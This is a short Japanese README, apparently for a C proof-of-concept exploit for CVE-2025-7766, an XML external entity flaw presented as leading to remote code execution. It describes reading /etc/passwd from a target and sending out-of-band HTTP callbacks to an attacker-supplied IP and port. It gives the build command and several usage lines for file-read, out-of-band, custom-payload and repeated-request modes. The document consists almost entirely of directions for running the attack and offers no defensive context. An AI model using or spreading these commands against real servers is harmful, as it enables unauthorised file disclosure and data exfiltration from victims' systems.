
CVE-2025-7766向けのCベースのPoCエクスプロイトで、ファイル読み取りと帯域外HTTPコールバックを介したXXE-to-RCEを実証します。カスタムXMLペイロードとリクエストの繰り返しをサポートします。
CVE-2025-7766のXML外部エンティティ脆弱性を悪用するPoC。ファイル読み取り(/etc/passwd)およびOut-of-Band HTTPコールバックを実演します。
作者: Byte Reaper
CVE: CVE-2025-7766
脆弱性: XML外部エンティティ(XXE)によるリモートコード実行
/etc/passwdを読み取る。gcc -o exploit exploit.c argparse.c -lcurl
# ファイル読み取りペイロード
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT
# Out-of-Bandリクエストペイロード
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r
# カスタムペイロード
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -b '<YOUR_CUSTOM_XML>'
# リクエストを5回繰り返す
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r -l 5
# 詳細出力
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -v
MIT